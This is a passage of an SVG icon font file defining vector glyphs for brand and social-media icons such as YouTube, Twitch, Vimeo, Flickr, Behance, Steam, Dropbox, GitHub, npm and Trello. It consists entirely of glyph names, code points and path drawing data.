<glyph unicode="&#xeeea;" glyph-name="youtube2" horiz-adv-x="2569" d="M344.012 790.601c0.209 0.865 0.344 1.479 0.388 1.8l1.042 7.559-47.349 0.267c-42.779 0.242-55.87-0.007-57.047-1.084-0.565-0.516-15.333-56.633-41.655-158.273-12.556-48.484-23.124-87.206-23.487-86.051s-15.391 56.498-33.397 122.98c-18.006 66.482-33.104 121.243-33.55 121.692-0.623 0.623-57.98 0.9-104.417 0.502-6.735-0.056-10.477 13.11 60.021-211.133 9.759-31.041 24.371-74.997 32.469-97.679 9.333-26.141 15.989-46.323 20.534-63.173 8.038-32.067 8.319-52.163 6.565-75.625-2.026-27.101-2.321-218.438-0.342-221.638 1.512-2.449 91.223-3.589 99.712-1.268 1.358 0.372 2.265 1.691 2.87 8.928 2.119 6.219 2.286 30.969 2.286 133.744v131.281l5.742 18.112c3.756 11.849 13.201 42.995 20.989 69.22 7.789 26.222 17.21 57.619 20.938 69.771 33.834 110.319 66.14 218.831 66.994 225.011l0.693 5.056zM846.122 631.349l-0.021-6.838-1.065-0.014-0.595-188.993-0.577-183.227-14.666-14.929c-16.424-16.719-29.585-23.101-41.488-20.113-12.963 3.254-12.64-1.8-13.722 214.768l-0.998 199.347h-94.316v-6.851h-1.086v-216.289c0-231.737-0.007-231.599 11.752-254.875 9.366-18.536 23.010-27.559 46.391-30.671h0.002c30.79-4.1 64.001 9.849 94.77 39.809l13.373 13.022v-22.445c0-19.396 0.554-22.601 4.070-23.58 5.756-1.605 77.173-1.707 84.89-0.126l6.396 1.314v6.628l1.086 0.223v495.098l-94.195-1.258zM606.892 533.67c-8.935 38.341-25.68 64.115-53.233 81.939-43.281 27.999-92.718 30.957-138.586 8.291-33.425-16.515-54.951-43.914-66.071-84.083-1.326-4.786-2.298-8.812-3.033-14.815-2.83-14.184-3.163-35.351-3.889-133.951-1.121-151.928 0.616-170.003 19.643-204.51 18.664-33.848 57.403-58.661 99.572-63.782 12.696-1.54 38.43 0.858 53.23 4.961 33.632 9.326 65.864 35.906 80.118 66.078 6.158 13.033 9.875 22.096 12.115 38.651 4.175 22.617 4.47 59.175 4.47 152.375-0.002 118.875-0.379 131.862-4.337 148.847zM499.34 223.997c-7.907-6.028-21.734-8.649-32.983-6.249-8.656 1.847-20.338 15.419-23.934 27.801-4.479 15.436-4.823 229.985-0.954 272.059 6.379 21.054 24.19 32.050 43.635 26.813 15.157-4.082 22.915-13.575 27.336-33.457 3.282-14.754 3.67-33.129 2.972-141.26-0.46-71.701-0.716-106.742-3.058-125.553-2.382-11.87-6.319-15.047-13.015-20.154zM2300.389 425.863h45.57l-0.726 41.281c-0.705 37.869-1.263 42.2-6.324 52.472-7.982 16.21-19.759 23.401-38.446 23.401-22.448 0-36.678-10.849-43.388-33.141-2.858-9.486-5.863-74.685-3.707-80.308 1.205-3.144 7.724-3.705 47.021-3.705zM1995.795 519.763c-6.077 12.247-17.385 18.278-30.525 17.806-10.221-0.365-21.561-4.677-32.488-13.010l-8.14-6.177v-296.598l8.14-6.177c18.429-14.052 38.674-17.031 52.619-7.703 5.519 3.691 9.117 8.779 11.919 16.861 3.647 10.524 3.965 24.003 3.489 148.772-0.495 130.043-0.781 137.702-5.014 146.226zM2560.878 653.367c-9.080 108.842-16.303 144.165-38.751 189.544-29.729 60.101-72.692 91.788-133.876 98.747-47.309 5.379-225.315 12.97-390.044 16.631-285.188 6.338-754.057-5.858-813.939-21.173-27.673-7.077-48.426-19.11-70.022-40.604-37.844-37.662-60.391-91.679-69.452-166.396-20.692-170.606-21.134-376.727-1.188-553.515 8.577-76.041 26.243-125.443 59.41-166.159 20.694-25.406 56.352-46.998 88.26-53.442 22.385-4.523 134.42-10.798 297.605-16.668 24.306-0.874 88.667-2.379 143.030-3.344 113.301-2.012 321.627-0.821 440.719 2.519 80.127 2.249 226.201 8.172 253.5 10.282 7.677 0.593 25.469 1.728 39.537 2.523 47.277 2.67 77.353 12.568 105.596 34.76 36.553 28.718 64.857 81.795 76.815 144.037 11.314 58.894 18.887 163.773 20.422 282.851 1.284 99.491-0.426 153.175-7.621 239.409zM1425.273 692.808l-52.982-0.654-2.326-565.143-45.932-0.581c-35.525-0.488-46.307 0.044-47.167 2.326-0.616 1.626-1.356 129.020-1.672 283.153l-0.581 280.246-103.493 1.307v88.304l305.829-1.235 1.307-87.069-52.982-0.654zM1750.216 368.883v-243.035h-83.725v25.583c0 19.247-0.735 25.583-2.979 25.583-1.64 0-9.226-6.344-16.861-14.098-16.557-16.817-36.171-30.367-52.91-36.63-34.662-12.968-67.589-5.4-81.618 18.75-12.838 22.11-13.082 27.052-13.082 256.335v210.547h83.653l0.654-198.265c0.623-194.821 0.714-198.393 5.377-206.333 6.182-10.521 15.608-13.347 30.597-9.231 8.817 2.423 14.836 6.707 29.143 20.931l18.024 17.952v374.946h83.725v-243.035zM2076.757 160.59c-7.372-16.424-23.806-32.509-37.283-36.485-35.167-10.382-63.375-1.923-95.935 28.708-10.103 9.505-19.51 17.224-20.931 17.224-1.712 0-2.616-7.449-2.616-22.094v-22.094h-83.725v655.845h83.725v-106.982c0-58.84 0.786-106.982 1.744-106.982s9.789 7.807 19.624 17.298c22.629 21.841 41.548 31.399 65.557 33.213 42.811 3.24 68.327-18.794 80.018-69.117 3.647-15.696 3.998-33.625 3.998-179.078-0.002-177.178-0.021-177.918-14.175-209.457zM2430.99 257.832c-0.744-18.226-2.954-39.137-4.942-46.514-11.642-43.167-42.635-73.731-87.432-86.269-60.315-16.878-126.704 10.777-153.205 63.812-14.875 29.769-15.408 35.706-15.408 181.185 0 118.617 0.419 133.171 4.214 149.354 10.747 45.788 37.392 75.422 82.49 91.865 13.068 4.765 26.708 7.207 40.337 7.486 48.672 0.998 96.984-25.18 117.229-67.808 13.659-28.76 15.35-41.060 16.717-122.099l1.235-72.678-178.497-1.235-0.654-48.84c-0.93-68.901 3.716-90.088 22.313-102.621 15.645-10.54 39.679-9.745 52.765 1.744 12.263 10.768 15.726 22.336 16.933 56.107l1.091 29.653h86.195l-1.381-33.143z" />
<glyph unicode="&#xeeeb;" glyph-name="twitch" d="M96 960l-96-160v-736h256v-128h128l128 128h160l288 288v608h-864zM832 416l-160-160h-160l-128-128v128h-192v576h640v-416zM608 704h96v-256h-96v256zM416 704h96v-256h-96v256z" />
<glyph unicode="&#xeeec;" glyph-name="vimeo" d="M1023.6 686c-4.6-99.6-74.2-236.2-208.8-409.4-139.2-180.8-257-271.4-353.4-271.4-59.6 0-110.2 55-151.4 165.2-27.6 101-55 202-82.6 303-30.6 110.2-63.4 165.2-98.6 165.2-7.6 0-34.4-16.2-80.4-48.2l-48.2 62c50.6 44.4 100.4 88.8 149.4 133.2 67.4 58.2 118 88.8 151.8 92 79.6 7.6 128.8-46.8 147.2-163.4 19.8-125.8 33.6-204 41.4-234.6 23-104.4 48.2-156.6 75.8-156.6 21.4 0 53.6 33.8 96.6 101.6 42.8 67.6 65.8 119.2 69 154.6 6.2 58.4-16.8 87.8-69 87.8-24.6 0-49.8-5.6-75.8-16.8 50.4 164.8 146.4 244.8 288.4 240.2 105-2.8 154.6-71 148.6-204.4z" />
<glyph unicode="&#xeeed;" glyph-name="vimeo2" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM861.6 620c-3.2-72-53.6-170.6-151-295.8-100.6-130.8-185.8-196.2-255.4-196.2-43.2 0-79.6 39.8-109.4 119.4-20 73-39.8 146-59.8 219-22 79.6-45.8 119.4-71.2 119.4-5.6 0-25-11.6-58-34.8l-34.8 44.8c36.6 32 72.6 64.2 108 96.2 48.8 42 85.2 64.2 109.6 66.4 57.6 5.6 93-33.8 106.4-118 14.4-91 24.4-147.4 30-169.6 16.6-75.4 34.8-113 54.8-113 15.4 0 38.8 24.4 69.8 73.4s47.6 86.2 49.8 111.8c4.4 42.2-12.2 63.4-49.8 63.4-17.8 0-36-4-54.8-12.2 36.4 119 105.8 177 208.4 173.6 76-2.2 111.8-51.4 107.4-147.8z" />
<glyph unicode="&#xeeee;" glyph-name="lanyrd" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM822.4 191.2l-348.4-114c-79.6-26-87.6-21.8-123.6 89.6l-88 272.6c-21 64.6-85 238.6-95.8 272-20 62-20 65.4 97 103.4 91.6 30 95.4 29 128.6-74.4 26.8-83.2 44-150.4 71.6-235.4l75-232 239.6 78.4c47.2 15.6 63 14.8 76.4-43.4l9.6-44c11.2-51-14.6-64-42-72.8z" />
<glyph unicode="&#xeeef;" glyph-name="flickr" d="M0 416c0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224s-224 100.288-224 224zM576 416c0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224s-224 100.288-224 224z" />
<glyph unicode="&#xeef0;" glyph-name="flickr2" d="M800 544c-70.58 0-128-57.42-128-128s57.42-128 128-128c70.58 0 128 57.42 128 128s-57.42 128-128 128zM800 640v0c123.71 0 224-100.288 224-224 0-123.71-100.29-224-224-224s-224 100.29-224 224c0 123.712 100.29 224 224 224zM0 416c0 123.712 100.288 224 224 224s224-100.288 224-224c0-123.712-100.288-224-224-224s-224 100.288-224 224z" />
<glyph unicode="&#xeef1;" glyph-name="flickr3" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM288 288c-88.4 0-160 71.6-160 160s71.6 160 160 160 160-71.6 160-160-71.6-160-160-160zM736 288c-88.4 0-160 71.6-160 160s71.6 160 160 160c88.4 0 160-71.6 160-160s-71.6-160-160-160z" />
<glyph unicode="&#xeef2;" glyph-name="flickr4" d="M512 960c-282.77 0-512-230.796-512-515.5s229.23-515.5 512-515.5 512 230.796 512 515.5-229.23 515.5-512 515.5zM288 288c-88.366 0-160 71.634-160 160s71.634 160 160 160 160-71.634 160-160c0-88.366-71.634-160-160-160zM736 288c-88.368 0-160 71.634-160 160s71.632 160 160 160 160-71.634 160-160c0-88.366-71.632-160-160-160z" />
<glyph unicode="&#xeef3;" glyph-name="dribbble" d="M512-64c-282.4 0-512 229.6-512 512s229.6 512 512 512c282.4 0 512-229.6 512-512s-229.6-512-512-512v0zM943.8 378c-15 4.8-135.4 40.6-272.4 18.6 57.2-157.2 80.4-285.2 85-311.8 98 66.4 168 171.4 187.4 293.2v0zM682.8 44.8c-6.6 38.4-31.8 172-93.2 331.6-1-0.4-2-0.6-2.8-1-246.8-86-335.4-257-343.2-273 74.2-57.8 167.4-92.4 268.4-92.4 60.6 0 118.4 12.4 170.8 34.8v0zM187 155c10 17 130 215.6 355.4 288.6 5.6 1.8 11.4 3.6 17.2 5.2-11 24.8-23 49.8-35.4 74.2-218.2-65.4-430.2-62.6-449.4-62.4-0.2-4.4-0.2-8.8-0.2-13.4 0-112.2 42.6-214.8 112.4-292.2v0zM84 537c19.6-0.2 199.8-1 404.4 53.2-72.4 128.8-150.6 237.2-162.2 253-122.4-57.8-214-170.6-242.2-306.2v0zM409.6 872.6c12-16.2 91.6-124.4 163.2-256 155.6 58.2 221.4 146.8 229.2 158-77.2 68.6-178.8 110.2-290 110.2-35.2-0.2-69.6-4.4-102.4-12.2v0zM850.6 723.8c-9.2-12.4-82.6-106.4-244.2-172.4 10.2-20.8 20-42 29-63.4 3.2-7.6 6.4-15 9.4-22.6 145.6 18.2 290.2-11 304.6-14-1 103.2-38 198-98.8 272.4v0z" />
<glyph unicode="&#xeef4;" glyph-name="behance" d="M297 754.8c30.2 0 57.4-2.6 82.2-8 24.8-5.2 45.8-14 63.6-26 17.6-12 31.2-28 41.2-48 9.6-19.8 14.4-44.6 14.4-74 0-31.8-7.2-58.2-21.6-79.4-14.6-21.2-35.8-38.4-64.2-52 38.8-11.2 67.4-30.8 86.6-58.6 19.2-28 28.4-61.6 28.4-101.2 0-32-6.2-59.4-18.4-82.6-12.4-23.4-29.2-42.4-49.8-57-20.8-14.8-44.8-25.6-71.6-32.6-26.6-7-54-10.6-82.4-10.6h-305.4v630h297zM279 500.4c24.6 0 45 5.8 61 17.6 16 11.6 23.6 30.8 23.6 57.2 0 14.6-2.6 26.8-7.8 36.2-5.4 9.4-12.4 16.8-21.4 22-8.8 5.4-18.8 9-30.6 11-11.4 2.2-23.4 3.2-35.6 3.2h-129.6v-147.2h140.4zM286.6 232.2c13.6 0 26.6 1.2 38.8 4 12.4 2.8 23.4 7 32.6 13.4 9.2 6.2 17 14.4 22.6 25.2 5.6 10.6 8.2 24.2 8.2 40.8 0 32.4-9.2 55.6-27.4 69.6-18.2 13.8-42.4 20.6-72.4 20.6h-150.4v-173.4h148zM725.2 234.4c18.8-18.4 45.8-27.6 81-27.6 25.2 0 47.2 6.4 65.4 19.2s29.2 26.4 33.4 40.4h110.4c-17.8-55-44.6-94-81.4-117.6-36.2-23.6-80.6-35.6-132-35.6-36 0-68.2 5.8-97.2 17.2-29 11.6-53.2 27.8-73.6 49-19.8 21.2-35.4 46.4-46.4 76-10.8 29.4-16.4 62-16.4 97.2 0 34.2 5.6 66 16.8 95.4 11.4 29.6 27 55 47.8 76.4s45.2 38.4 74 50.8c28.6 12.4 60.2 18.6 95.2 18.6 38.6 0 72.4-7.4 101.4-22.6 28.8-15 52.6-35.2 71.2-60.4s31.8-54.2 40-86.6c8.2-32.4 11-66.2 8.8-101.6h-329.4c0-35.8 12-70 31-88.2zM869 474c-14.8 16.4-40.2 25.4-70.8 25.4-20 0-36.6-3.4-49.8-10.2-13-6.8-23.6-15.2-31.8-25.2-8-10-13.6-20.8-16.8-32.2-3.2-11-5.2-21.2-5.8-30h204c-3 32-14 55.6-29 72.2zM668.4 704h255.4v-62.2h-255.4v62.2z" />
<glyph unicode="&#xeef5;" glyph-name="behance2" d="M404.2 511.4c13 9.4 19.2 25 19.2 46.6 0 12-2 21.8-6.2 29.4-4.4 7.6-10 13.6-17.4 17.8-7.2 4.4-15.4 7.4-24.8 9-9.2 1.8-19 2.6-29 2.6h-105.4v-119.6h114c20-0.2 36.6 4.6 49.6 14.2zM422 403.4c-14.8 11.2-34.4 16.8-58.8 16.8h-122.6v-141h120.2c11.2 0 21.6 1 31.6 3.2s19 5.6 26.6 10.8c7.6 5 13.8 11.8 18.4 20.4s6.8 19.8 6.8 33.2c0 26.4-7.4 45.2-22.2 56.6zM928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM671.2 690.6h207.4v-50.6h-207.4v50.6zM541.6 273.6c-10-19-23.6-34.4-40.4-46.4-17-12-36.4-20.8-58.2-26.6-21.6-5.8-44-8.6-66.8-8.6h-248.2v511.8h241.2c24.4 0 46.6-2.2 66.8-6.4 20-4.2 37.2-11.4 51.6-21.2 14.2-9.8 25.4-22.8 33.4-39 7.8-16 11.8-36.2 11.8-60 0-25.8-5.8-47.2-17.6-64.4s-29-31.2-52.2-42.2c31.6-9 54.8-25 70.2-47.6 15.6-22.8 23.2-50.2 23.2-82.2 0.2-26.2-4.8-48.6-14.8-67.2zM959.4 352.8h-267.4c0-29.2 10-57 25.2-72 15.2-14.8 37.2-22.4 65.8-22.4 20.6 0 38.2 5.2 53.2 15.6 14.8 10.4 23.8 21.4 27.2 32.8h89.6c-14.4-44.6-36.2-76.4-66-95.6-29.4-19.2-65.4-28.8-107.2-28.8-29.2 0-55.4 4.8-79 14-23.6 9.4-43.2 22.6-59.8 39.8-16.2 17.2-28.6 37.8-37.6 61.8-8.8 23.8-13.4 50.4-13.4 79 0 27.8 4.6 53.6 13.6 77.6 9.2 24 22 44.8 38.8 62 16.8 17.4 36.8 31.2 60 41.4 23.2 10 48.8 15 77.2 15 31.4 0 58.8-6 82.4-18.4 23.4-12.2 42.6-28.6 57.8-49.2s25.8-44 32.6-70.4c6.6-26 8.8-53.4 7-82.2zM776.6 496.2c-16.2 0-29.8-2.8-40.4-8.4s-19.2-12.4-25.8-20.4c-6.6-8.2-11-16.8-13.6-26.2-2.6-9-4.2-17.2-4.6-24.4h165.6c-2.4 26-11.4 45.2-23.4 58.6-12.4 13.6-32.8 20.8-57.8 20.8z" />
<glyph unicode="&#xeef6;" glyph-name="deviantart" d="M829 773.8v186.2h-186.2l-18.6-18.8-88-167.4-27.6-18.6h-313.6v-255.6h172.4l15.4-18.6-187.8-358.8v-186.2h186.2l18.6 18.8 88 167.4 27.6 18.6h313.6v255.6h-172.4l-15.4 18.8z" />
<glyph unicode="&#xeef7;" glyph-name="500px" d="M253 287.2c0.2-0.6 5.6-15.2 8.6-22.6 16.8-39.8 41-75.8 71.8-106.6s66.6-55 106.6-71.8c41.4-17.4 85.2-26.4 130.4-26.4s89.2 8.8 130.4 26.4c40 16.8 75.8 41 106.6 71.8s55 66.6 71.8 106.6c17.4 41.4 26.4 85.2 26.4 130.4s-8.8 89.2-26.4 130.4c-16.8 40-41 75.8-71.8 106.6s-66.6 55-106.6 71.8c-41.4 17.4-85.2 26.4-130.4 26.4-45.8 0-91.6-9.2-132.2-26.4-32.6-13.8-87.8-49.2-120-82.6l-0.2-0.2v276h463.4c16.8 0.2 16.8 23.8 16.8 31.4 0 7.8 0 31.2-17 31.4h-501c-13.6 0-22-11.4-22-21.8v-388.2c0-12.6 15.6-21.6 30.2-24.6 28.4-6 34.8 3 41.8 12.6l1 1.2c10.6 15.8 43.6 49 44 49.4 51.6 51.6 120.6 80 194.4 80 73.4 0 142.2-28.4 193.8-80 51.8-51.8 80.4-120.4 80.4-193.2 0-73-28.4-141.8-80-193.2-50.8-50.8-122-80-195-80-49.4 0-97.2 13.2-138.2 38.2l0.2 236c0 31.4 13.6 65.8 36.6 91.6 26.2 29.6 62.2 45.8 101.6 45.8 38 0 73.6-14.4 100.2-40.6 26.2-26 40.8-60.8 40.8-97.8 0-78.8-62-140.6-141.2-140.6-15.2 0-43 6.8-44.2 7-16 4.8-22.8-17.4-25-24.8-8.6-28.2 4.4-33.8 7-34.6 25.4-8 42.2-9.4 64.2-9.4 111.8 0 202.8 91 202.8 202.8 0 111-91 201.2-202.6 201.2-54.8 0-106.2-21-144.8-58.8-36.8-36.2-57.8-84.4-57.8-132.4v-1.2c-0.2-6-0.2-147.6-0.4-194l-0.2 0.2c-21 23.2-41.8 58.8-55.6 95.2-5.4 14.2-17.6 11.8-34.2 6.6-8-2.2-30-9-25-25.2v0zM491.2 342.6c0-6.8 6.2-12.8 10-16.2l1.2-1.2c6.4-6.2 12.4-9.4 18-9.4 4.6 0 7.4 2.2 8.4 3.2 2.8 2.6 34.4 34.8 37.6 37.8l35.4-35.2c3.2-3.6 6.8-5.6 11-5.6 5.6 0 11.8 3.4 18.2 10 15.2 15.6 7.6 24 4 28l-35.8 35.8 37.4 37.6c8.2 8.8 1 18.2-6.2 25.4-10.4 10.4-20.6 13.2-27 7.2l-37.2-37.2-37.6 37.6c-2 2-4.6 3-7.2 3-5 0-11-3.4-17.6-10-11.6-11.6-14-19.6-8-26l37.6-37.4-37.4-37.4c-3.4-3.2-5-6.6-4.8-10zM573 850.2c-60 0-124-12.2-170.8-32.4-5-2-8-6-8.6-11.6-0.6-5.4 0.8-12.4 4.4-21.6 3-7.4 10.6-27.2 25.6-21.4 48 18.4 101.2 28.4 149.4 28.4 54.8 0 108-10.8 158-31.8 39.8-16.8 77.2-41.2 118-76.4 3-2.6 6.2-3.8 9.4-3.8 8 0 15.6 7.8 22.2 15.2 10.8 12.2 18.4 22.4 7.6 32.6-39 36.8-81.6 64.4-134.4 86.8-57.2 23.8-118.2 36-180.8 36zM896.4 108.8v0c-7.2 7.2-13.4 11.4-18.8 13s-10.4 0.4-14.2-3.4l-3.6-3.6c-37.2-37.2-80.6-66.4-128.8-86.8-50-21.2-103-31.8-157.6-31.8-54.8 0-107.8 10.8-157.6 31.8-48.2 20.4-91.6 49.6-128.8 86.8-38.8 38.8-68 82.2-86.8 128.8-18.4 45.6-24.4 79.8-26.4 91-0.2 1-0.4 1.8-0.4 2.4-2.6 13.2-14.8 14.2-32.2 11.4-7.2-1.2-29.4-4.6-27.4-20.4v-0.4c5.8-37 16.2-73.2 30.8-107.6 23.4-55.4 57-105.2 99.8-148s92.6-76.2 148-99.8c57.4-24.2 118.4-36.6 181.2-36.6s123.8 12.4 181.2 36.6c55.4 23.4 105.2 57 148 99.8 0 0 2.4 2.4 3.8 3.8 4.4 5.4 8.6 14.4-10.2 33z" />
<glyph unicode="&#xeef8;" glyph-name="steam" d="M704 672c0 53.019 42.981 96 96 96s96-42.981 96-96c0-53.019-42.981-96-96-96s-96 42.981-96 96zM958.392 830.392c-87.478 87.476-229.306 87.476-316.786 0-35.578-35.578-56.684-80.146-63.322-126.392v0l-204.694-310.228c-27.506-1.41-54.776-8.416-79.966-21.016l-157.892 123.424c-36.55 28.574-89.342 22.102-117.912-14.448-28.572-36.55-22.102-89.342 14.448-117.912l155.934-121.892c-16.96-66.782 0.672-140.538 52.93-192.794 78.906-78.904 206.832-78.904 285.736 0 48.466 48.466 67.15 115.428 56.076 178.166l249.054 222.986c46.248 6.638 90.816 27.744 126.394 63.322 87.478 87.476 87.478 229.306 0 316.784zM384 57.302c-74.39 0-134.698 60.304-134.698 134.698 0 0.712 0.042 1.414 0.054 2.124l66.912-52.304c15.36-12.006 33.582-17.824 51.674-17.824 24.962 0 49.672 11.080 66.238 32.272 28.572 36.55 22.102 89.342-14.448 117.912l-63.5 49.636c8.962 1.878 18.248 2.88 27.768 2.88 74.392 0 134.698-60.304 134.698-134.698s-60.306-134.696-134.698-134.696zM800 512c-88.366 0-160 71.634-160 160s71.634 160 160 160 160-71.634 160-160-71.634-160-160-160z" />
<glyph unicode="&#xeef9;" glyph-name="steam2" d="M303.922 123.99c27.144 0 53.786 13.136 69.972 37.416 25.734 38.602 15.302 90.754-23.298 116.488l-66.074 44.048c11.308 3.080 23.194 4.756 35.478 4.756 74.392 0 134.696-60.304 134.696-134.698s-60.306-134.698-134.698-134.698c-72.404 0-131.444 57.132-134.548 128.774l71.954-47.968c14.322-9.548 30.506-14.118 46.518-14.118zM853.34 960c93.876 0 170.66-76.812 170.66-170.688v-682.628c0-93.936-76.784-170.684-170.66-170.684h-682.652c-93.876 0-170.688 76.75-170.688 170.682v203.028l121.334-80.888c-11.652-63.174 6.938-130.83 55.798-179.69 78.904-78.904 206.83-78.904 285.736 0 48.468 48.466 67.15 115.43 56.076 178.166l249.056 222.988c46.248 6.638 90.816 27.744 126.394 63.322 87.476 87.476 87.476 229.306 0 316.784-87.48 87.478-229.308 87.478-316.786 0-35.578-35.578-56.684-80.146-63.322-126.392v0l-204.694-310.23c-31.848-1.632-63.378-10.764-91.726-27.392l-217.866 145.244v277.69c0 93.876 76.81 170.688 170.686 170.688h682.654zM896 672c0 88.366-71.634 160-160 160s-160-71.634-160-160 71.634-160 160-160 160 71.634 160 160zM640 672c0 53.020 42.98 96 96 96s96-42.98 96-96-42.98-96-96-96-96 42.98-96 96z" />
<glyph unicode="&#xeefa;" glyph-name="dropbox" d="M736 928l-224-192 288-192 224 192zM512 736l-224 192-288-192 224-192zM800 544l224-192-288-160-224 192zM512 384l-288 160-224-192 288-160zM728.156 114.43l-216.156 185.278-216.158-185.278-135.842 75.468v-93.898l352-160 352 160v93.898z" />
<glyph unicode="&#xeefb;" glyph-name="onedrive" d="M350.868 131.612c-60.274 15.060-93.856 62.97-93.962 134.064-0.032 22.726 1.612 33.62 7.286 48.236 13.908 35.834 50.728 62.872 99.176 72.822 24.11 4.95 31.536 10.266 31.536 22.572 0 3.862 2.872 15.36 6.378 25.552 15.932 46.306 45.43 84.91 76.948 100.702 32.99 16.526 49.642 20.254 89.548 20.040 56.674-0.304 84.952-12.598 124.496-54.128l21.75-22.842 19.484 6.742c94.3 32.636 188.306-22.916 195.888-115.756l2.072-25.398 18.57-6.65c53.032-19.004 77.96-58.904 73.442-117.556-2.958-38.358-20.89-68.98-49.3-84.184l-13.356-7.146-296.822-0.57c-228.094-0.44-300.6 0.368-313.134 3.5v0zM103.218 174.034c-36.176 9.086-74.506 42.854-92.48 81.47-10.196 21.906-10.738 25.128-10.738 63.88 0 36.864 0.87 42.778 8.988 61.080 17.11 38.582 49.894 66.46 91.030 77.408 8.684 2.312 16.842 6 18.128 8.196 1.29 2.198 2.722 14.164 3.182 26.592 2.866 77.196 50.79 145.214 117.708 167.056 36.154 11.8 83.572 12.898 122.896-3.726 12.47-5.274 11.068-6.404 37.438 30.14 15.594 21.612 45.108 44.49 70.9 58.18 27.838 14.776 56.792 21.584 91.412 21.494 96.768-0.252 180.166-64.22 211.004-161.848 9.854-31.192 9.362-39.926-2.26-40.184-5.072-0.112-19.604-3.064-32.292-6.558l-23.072-6.358-21.052 22.25c-59.362 62.734-156.238 76.294-238.592 33.396-32.9-17.138-59.34-41.746-79.31-73.81-14.236-22.858-32.39-65.504-32.39-76.094 0-7.51-5.754-11.264-30.332-19.782-76.094-26.376-120.508-87.282-120.476-165.218 0.010-28.368 6.922-63.074 16.52-82.956 3.618-7.494 5.634-14.622 4.484-15.836-2.946-3.106-97.608-2.060-110.696 1.228v0z" />
<glyph unicode="&#xeefc;" glyph-name="github" d="M512.008 947.358c-282.738 0-512.008-229.218-512.008-511.998 0-226.214 146.704-418.132 350.136-485.836 25.586-4.738 34.992 11.11 34.992 24.632 0 12.204-0.48 52.542-0.696 95.324-142.448-30.976-172.504 60.41-172.504 60.41-23.282 59.176-56.848 74.916-56.848 74.916-46.452 31.778 3.51 31.124 3.51 31.124 51.4-3.61 78.476-52.766 78.476-52.766 45.672-78.27 119.776-55.64 149.004-42.558 4.588 33.086 17.852 55.68 32.506 68.464-113.73 12.942-233.276 56.85-233.276 253.032 0 55.898 20.004 101.574 52.76 137.428-5.316 12.9-22.854 64.972 4.952 135.5 0 0 43.006 13.752 140.84-52.49 40.836 11.348 84.636 17.036 128.154 17.234 43.502-0.198 87.336-5.886 128.256-17.234 97.734 66.244 140.656 52.49 140.656 52.49 27.872-70.528 10.35-122.6 5.036-135.5 32.82-35.856 52.694-81.532 52.694-137.428 0-196.654-119.778-239.95-233.79-252.624 18.364-15.89 34.724-47.046 34.724-94.812 0-68.508-0.596-123.644-0.596-140.508 0-13.628 9.222-29.594 35.172-24.566 203.322 67.776 349.842 259.626 349.842 485.768 0 282.78-229.234 511.998-511.992 511.998z" />
<glyph unicode="&#xeefd;" glyph-name="npm" d="M0 960v-1024h1024v1024h-1024zM832 128h-128v512h-192v-512h-320v640h640v-640z" />
<glyph unicode="&#xeefe;" glyph-name="basecamp" d="M512 853.4c-186.8 0-330.8-156.4-412.4-309.6-46-86.2-78.2-180.6-93-277.2-1.6-11-3.2-22-4.4-33.2-0.6-6-1.2-12-1.6-18-0.6-7.6-0.2-10 3.8-16.4 12-19.4 26.2-37.4 42.2-53.6 32.8-33.6 72.6-59.4 114.8-79.4 96.2-45.4 204.8-61.8 310.4-65.4 109-3.6 221 5.4 325.2 39.4 89 29 174.8 79.6 224.2 161.4 5.4 8.8 1.6 21.8 0.6 32-1.2 12.2-2.8 24.2-4.8 36.2-3.6 23.6-8.4 46.8-14.2 70-11.6 47.2-27.4 93.6-46.6 138.2-69.6 161.6-198.4 334-381.6 369.6-20.6 4-41.6 6-62.6 6zM518.4 69.8c-114.2 0-238.6 10.2-341.4 65.2-40 21.4-80.8 52.4-100 95-5.6 12.4-3.6 17.2-1 31.8 1.8 9.4 2.6 18.6 6.8 27.4 5.8 12.2 11.8 24.2 18 36.2 21 40.6 43.6 80.8 69.8 118.6 13 18.6 26.8 37 42.8 53 11.2 11.2 24.8 23.2 40.6 27 48.4 11.6 85.4-44.4 114.8-72.6 14.2-13.6 33.2-29 54.4-26.4 14.6 1.8 27.6 13.2 38 22.6 35.4 31.8 63.8 71.2 93.2 108.2 14.6 18.2 29 36.6 44.8 54 10.6 11.8 22.2 25.2 36.4 32.8 25.4 13.8 57.8-14.6 75.4-29.2 30-25 56.6-54.2 82-83.8 24.2-28.2 47.6-56.8 68.2-87.8 31.8-48 59.4-99.2 84.6-151 5.4-11.2 7.2-18.8 9.2-31.2 1.2-6.8 3.8-14.6 2.8-21.6-1.4-9.8-8.2-20.4-13.2-28.4-12-19-28.2-35.4-46-49.2-74.6-57.8-175.6-77-267.4-85.6-37.6-3.6-75.2-5-112.8-5z" />
<glyph unicode="&#xeeff;" glyph-name="trello" d="M928 960h-832c-52.8 0-96-43.2-96-96v-832c0-52.8 43.2-96 96-96h832c52.8 0 96 43.2 96 96v832c0 52.8-43.2 96-96 96zM448 192c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64v512c0 35.2 28.8 64 64 64h128c35.2 0 64-28.8 64-64v-512zM832 384c0-35.2-28.8-64-64-64h-128c-35.2 0-64 28.8-64 64v320c0 35.2 28.8 64 64 64h128c35.2 0 64-28.8 64-64v-320z" />
